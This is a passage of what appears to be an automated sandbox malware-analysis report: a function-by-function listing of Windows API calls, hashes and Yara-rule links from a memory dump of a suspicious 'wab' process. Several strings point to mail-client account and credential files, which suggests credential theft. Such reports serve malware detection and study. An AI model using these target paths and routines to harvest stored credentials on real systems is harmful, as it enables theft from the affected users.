                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                    • Opcode ID: 4e1979cb42be2ec706ff35a90e261f88fde757364ddd2da0c938d6939590ed4b
                                                                                                                                                                                                                    • Instruction ID: 34b1bb63fc05637dc97618259549f41bd197f66ffdf5ea1df6f37970af28c0b7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e1979cb42be2ec706ff35a90e261f88fde757364ddd2da0c938d6939590ed4b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACF05F71C20209EBCB00DBF4D54DA9EBBF8FF58316F9284959412F7140EB74AB069B51
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D2B1C Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,352D2C3B,352DD1DC,00000017), ref: 352D2B21
                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(352DD1DC,?,352D2C3B,352DD1DC,00000017), ref: 352D2B2A
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,352D2C3B,352DD1DC,00000017), ref: 352D2B35
                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,352D2C3B,352DD1DC,00000017), ref: 352D2B3C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                                    • Opcode ID: c7011d647c3e6db6bd9d454de52fe8882a6e43a3daf3d882a9d86fef618e1df2
                                                                                                                                                                                                                    • Instruction ID: 92ad517dbd522924eb75db47d2460ffd14e3521d519a0e7bdfaae032bbbba23e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7011d647c3e6db6bd9d454de52fe8882a6e43a3daf3d882a9d86fef618e1df2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21D0C931C54604EBC6002BE0ED0CA593FACAB84323F824000F719A2080CE318403CB51
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D60E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 352D61DA
                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 352D61E4
                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 352D61F1
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                    • Opcode ID: f763eac5c08ac54d43111b7b18826e3f6da323392522f29b4ab38dc3fd691dd2
                                                                                                                                                                                                                    • Instruction ID: dc5cfc4714ebfd4f1fd7da4c7aa8f9f9ed018579881cc4c292e4f0df00803dfc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f763eac5c08ac54d43111b7b18826e3f6da323392522f29b4ab38dc3fd691dd2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A031B575D1121D9BCB21DF64D988B8DBBF8BF08310F5041DAE82CA7250EB349B858F45
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D4AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,352D4A8A,?,352E2238,0000000C,352D4BBD,00000000,00000000,00000001,352D2082,352E2108,0000000C,352D1F3A,?), ref: 352D4AD5
                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,352D4A8A,?,352E2238,0000000C,352D4BBD,00000000,00000000,00000001,352D2082,352E2108,0000000C,352D1F3A,?), ref: 352D4ADC
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 352D4AEE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                    • Opcode ID: 011f86b96cd2fd25149962aeaaf8f57e81eb171d393e8a932b526fc7ec81aa20
                                                                                                                                                                                                                    • Instruction ID: fef8ef44e5175082c51824d6b305fdbf40c0b130c4b225e3470d0e933715d714
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 011f86b96cd2fd25149962aeaaf8f57e81eb171d393e8a932b526fc7ec81aa20
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9E04F3A910544EFCF016F14DD0CA49BFA9FF40352B414010F96957060CB75D843CA84
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D2933 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 352D294C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                                                                    • Opcode ID: db4a9cec480280982d69bdfce288038e956b5984c4ea1e727b88d1a92bf4abdc
                                                                                                                                                                                                                    • Instruction ID: de5cc373edf3095ccd0a62b9e80c688bf01a854390a8ac7ed3bc01c65e9b8f74
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db4a9cec480280982d69bdfce288038e956b5984c4ea1e727b88d1a92bf4abdc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC41CDB59252058BEB11CF54D5C5B9EFBF4FB08300F20956AD41AFB284D774AA01CF60
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                    • Opcode ID: 91979b7eafc4bca259b667a4d3ac142b1b73d87c293e2574842a8823fe0d1dd6
                                                                                                                                                                                                                    • Instruction ID: 09fab1c805251ba1e39b9630c04bd18da12b3b4855b9d5c8ecaf3deef644b72e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91979b7eafc4bca259b667a4d3ac142b1b73d87c293e2574842a8823fe0d1dd6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5A01130A20202CF83008E30A20E20C3EECAA803A230200A8A808E00C0EF2080028A00
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D1CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 352D1D1B
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 352D1D37
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 352D1D4B
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 352D1D58
                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 352D1D72
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 352D1D7D
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 352D1D8A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1454806937-0
                                                                                                                                                                                                                    • Opcode ID: a4d2959d8983d400c9f4092ec600b033be1770c504538afd4a3296ae1e9f0fb1
                                                                                                                                                                                                                    • Instruction ID: 7515efc8d573e7f0e7e40b9306dfa11e5f67f62eb1ac179842d31cd8dcc711aa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4d2959d8983d400c9f4092ec600b033be1770c504538afd4a3296ae1e9f0fb1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E214CB1D4161CAFE7109BA09C8CFEABAFCEB48355F4145A5F525E2180DB709E468AB0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D39BE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 248 352d39be-352d39c8 249 352d3a6e-352d3a71 248->249 250 352d39cd-352d39dd 249->250 251 352d3a77 249->251 252 352d39df-352d39e2 250->252 253 352d39ea-352d3a03 LoadLibraryExW 250->253 254 352d3a79-352d3a7d 251->254 255 352d39e8 252->255 256 352d3a6b 252->256 257 352d3a55-352d3a5e 253->257 258 352d3a05-352d3a0e GetLastError 253->258 259 352d3a67-352d3a69 255->259 256->249 257->259 260 352d3a60-352d3a61 FreeLibrary 257->260 261 352d3a45 258->261 262 352d3a10-352d3a22 call 352d55f6 258->262 259->256 264 352d3a7e-352d3a80 259->264 260->259 263 352d3a47-352d3a49 261->263 262->261 268 352d3a24-352d3a36 call 352d55f6 262->268 263->257 267 352d3a4b-352d3a53 263->267 264->254 267->256 268->261 271 352d3a38-352d3a43 LoadLibraryExW 268->271 271->263
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                    • API String ID: 0-537541572
                                                                                                                                                                                                                    • Opcode ID: d4fa2b997380f560d44d42c93e805df1480583886c070c5db93fc66866c09753
                                                                                                                                                                                                                    • Instruction ID: bb15a9d510e58b6ac354df8dfdccfd0dbf8e325041526fb69856903ee0985b40
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4fa2b997380f560d44d42c93e805df1480583886c070c5db93fc66866c09753
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2711A576F15B12EBD7119A65DC84E4ABBD9AF11BB0F510111EC3EB7280EB74D90186E0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D1000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 352D1038
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 352D104B
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 352D1061
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 352D1075
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 352D1090
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 352D10B8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3594823470-0
                                                                                                                                                                                                                    • Opcode ID: ae4e2d54ef0f87809fc72c1b7e16aa14d4ffa698aaeed9c1caa1dd57eb507908
                                                                                                                                                                                                                    • Instruction ID: d0cdc19c182d4d4a4cafd0034fbecace9a90b0ce773f2cba4c886e3e3d17c4eb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae4e2d54ef0f87809fc72c1b7e16aa14d4ffa698aaeed9c1caa1dd57eb507908
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8218175D003599BCF10EB60DC48EDB77B9EF84325F504296E879975A1DE309A86CB80
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D11EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 352D1E89: lstrlenW.KERNEL32(?,?,?,?,?,352D10DF,?,?,?,00000000), ref: 352D1E9A
                                                                                                                                                                                                                      • Part of subcall function 352D1E89: lstrcatW.KERNEL32(?,?), ref: 352D1EAC
                                                                                                                                                                                                                      • Part of subcall function 352D1E89: lstrlenW.KERNEL32(?,?,352D10DF,?,?,?,00000000), ref: 352D1EB3
                                                                                                                                                                                                                      • Part of subcall function 352D1E89: lstrlenW.KERNEL32(?,?,352D10DF,?,?,?,00000000), ref: 352D1EC8
                                                                                                                                                                                                                      • Part of subcall function 352D1E89: lstrcatW.KERNEL32(?,352D10DF), ref: 352D1ED3
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 352D122A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                    • API String ID: 1475205934-1520055953
                                                                                                                                                                                                                    • Opcode ID: 0e61a1ef57e1f6f0ff51aab535ae7b829e4dc1ab51291954c6e2d73c11bce2cb
                                                                                                                                                                                                                    • Instruction ID: b0ad99463b918670bf4e080ac8f9cd09af829fff22a7def463697366834a0b4c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e61a1ef57e1f6f0ff51aab535ae7b829e4dc1ab51291954c6e2d73c11bce2cb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB21F6B9F102486AEB1097E0EC81FEEB379EF80714F400556F614EB1D0EAB12D818758
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D4B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 312 352d4b39-352d4b61 GetModuleHandleExW 313 352d4b86-352d4b8a 312->313 314 352d4b63-352d4b76 GetProcAddress 312->314 317 352d4b8c-352d4b8f FreeLibrary 313->317 318 352d4b95-352d4ba2 call 352d2ada 313->318 315 352d4b78-352d4b83 314->315 316 352d4b85 314->316 315->316 316->313 317->318
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,352D4AEA,?,?,352D4A8A,?,352E2238,0000000C,352D4BBD,00000000,00000000), ref: 352D4B59
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 352D4B6C
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,352D4AEA,?,?,352D4A8A,?,352E2238,0000000C,352D4BBD,00000000,00000000,00000001,352D2082), ref: 352D4B8F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                    • Opcode ID: 6163d68af320317831c74e45cb67a381353a3914933b634133835c1aca48a53e
                                                                                                                                                                                                                    • Instruction ID: 348b760260699d7d19e6d325f07343ab04746a5c8e861e6e22f93edd78b90575
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6163d68af320317831c74e45cb67a381353a3914933b634133835c1aca48a53e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF03C76D14508EBDB119B90D808FADFFF9EF44362F8241A4E81AA6190DF719942CA90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D9492 Relevance: 7.7, APIs: 5, Instructions: 152fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,352D9C07,?,00000000,?,00000000,00000000), ref: 352D94D4
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 352D9590
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,352D9C07,00000000,?,?,?,?,?,?,?,?,?,352D9C07,?), ref: 352D95AF
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,352D9C07,00000000,?,?,?,?,?,?,?,?,?,352D9C07,?), ref: 352D95E8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 977765425-0
                                                                                                                                                                                                                    • Opcode ID: 13e1ed50b105ca402b18a377e6c24d802ab68e896c90dbd0542dc7f5e448044d
                                                                                                                                                                                                                    • Instruction ID: 42b3f237cc9a1d85990baf0519c142bd17c0392ebf77fe3514dcd47d36919eda
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13e1ed50b105ca402b18a377e6c24d802ab68e896c90dbd0542dc7f5e448044d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E751A1B1E14209AFDB00CFA5D895AEEFBF9FF08310F14411AF565E7281DA70A941CBA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D1E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,352D10DF,?,?,?,00000000), ref: 352D1E9A
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 352D1EAC
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,352D10DF,?,?,?,00000000), ref: 352D1EB3
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,352D10DF,?,?,?,00000000), ref: 352D1EC8
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,352D10DF), ref: 352D1ED3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 493641738-0
                                                                                                                                                                                                                    • Opcode ID: 17a305afa1e54f10496e885abcebc1db55200c53e8a2e8447116b46f641271c4
                                                                                                                                                                                                                    • Instruction ID: 74164d8199e142745348073efbea29d5e1aee8f4c8262e2cf2c8e6f7655feb29
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17a305afa1e54f10496e885abcebc1db55200c53e8a2e8447116b46f641271c4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11F0E966940110BAD2212719EC89E7FBBBCFFC5B71F904019F50C93180DB54584382B5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D15DA Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,352D190E,?,?,00000000,?,00000000), ref: 352D1643
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 352D165A
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,352D190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 352D1661
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00001008,?), ref: 352D1686
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
